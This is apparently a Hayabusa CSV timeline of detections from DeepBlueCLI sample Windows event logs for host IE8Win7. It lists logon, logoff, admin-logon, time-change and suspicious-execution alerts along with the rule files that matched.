2013-10-24 04:38:41.448 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x24936 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:38:41.448 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x24902,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:39:04.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 04:39:04.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 04:42:34.667 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:42:34.667 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:42:34.667 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:42:56.213 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x24936,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:45:27.593 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:45:27.593 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:45:58.015 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:46:01.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 04:46:10.368 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:46:10.368 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:46:10.368 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:47:07.743 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:47:07.743 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x19489 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:47:07.743 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x194bb : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:47:07.743 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x19489,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:49:30.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 04:49:30.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 04:54:00.258 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x194bb,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:54:45.140 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:54:45.140 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:54:58.140 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:55:02.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 04:55:06.370 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:55:06.370 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:55:06.370 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:55:29.463 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:55:29.463 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x19153 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:55:29.463 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1917f : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:55:29.463 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x19153,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:57:31.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 04:57:31.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 05:49:57.323 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x1917f,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 05:53:53.609 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 05:53:53.609 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 05:54:11.078 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 05:54:23.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 05:54:29.619 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 05:54:29.619 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 05:54:29.619 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 05:55:00.775 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 05:55:00.775 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x2b15e : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 05:55:00.775 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x2b18a : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 05:55:00.775 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x2b15e,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 05:56:36.634 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 05:56:36.634 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 05:56:36.649 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 05:56:52.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 05:56:52.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 06:05:37.180 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x2b18a,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:07:06.390 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 06:07:06.390 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 06:07:31.859 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:07:35.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 06:07:44.487 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 06:07:44.487 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 06:07:44.487 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:09:53.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 06:09:53.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 06:13:38.283 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:13:38.283 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x25519 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:13:38.283 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x2553c : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:13:38.283 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x25519,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:35:27.013 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 06:35:27.013 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 06:35:27.028 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:50:27.138 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IEUser : Target User: rdavis : IP Address: - : Process: : Target Server: cifs/rdavis-7.sharplogic.local,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:53:45.841 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: - : Process: C:\Windows\System32\svchost.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:53:45.841 +09:00,IE8Win7,4624,informational,Logon Type 4 - Batch,User: IEUser : Workstation: IE8WIN7 : IP Address: - : Port: - : LogonID: 0x15f454,rules/hayabusa/default/events/Security/Logons/4624_LogonType-4-Batch.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:53:45.841 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x15f454,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:53:45.919 +09:00,IE8Win7,4634,informational,Logoff,User: IEUser : LogonID: 0x15f454,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:53:46.263 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: - : Process: C:\Windows\System32\lsass.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:53:46.263 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: - : Port: - : LogonID: 0x15f53a : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:53:46.263 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: - : Port: - : LogonID: 0x15f546 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:53:46.263 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x15f53a,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:53:46.669 +09:00,IE8Win7,4634,informational,Logoff,User: IEUser : LogonID: 0x15f546,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:53:46.669 +09:00,IE8Win7,4634,informational,Logoff,User: IEUser : LogonID: 0x15f53a,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:54:01.732 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x2553c,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:55:02.343 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 06:55:02.343 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 06:55:25.000 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:55:32.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 06:55:35.625 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:55:35.625 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0xdad4 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:55:35.625 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0xdafc : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:55:35.625 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0xdad4,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:55:37.450 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 06:55:37.450 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 06:55:37.450 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:55:44.840 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: - : Process: C:\Windows\System32\svchost.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:55:44.840 +09:00,IE8Win7,4624,informational,Logon Type 4 - Batch,User: IEUser : Workstation: IE8WIN7 : IP Address: - : Port: - : LogonID: 0x13dbc,rules/hayabusa/default/events/Security/Logons/4624_LogonType-4-Batch.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:55:44.840 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x13dbc,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:57:51.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 06:57:51.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 07:00:55.356 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0xdafc,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 07:00:55.903 +09:00,IE8Win7,4634,informational,Logoff,User: IEUser : LogonID: 0xdafc,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 07:00:55.903 +09:00,IE8Win7,4634,informational,Logoff,User: IEUser : LogonID: 0xdad4,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 07:01:28.840 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 07:01:28.840 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x4bafc : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 07:01:28.840 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x4bb14 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 07:01:28.840 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x4bafc,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 07:04:16.809 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x4bb14,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 07:05:00.218 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 07:05:00.218 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 07:05:21.859 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 07:05:31.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 07:05:32.609 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 07:05:32.609 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0xd99e : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 07:05:32.609 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0xd9c6 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 07:05:32.609 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0xd99e,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
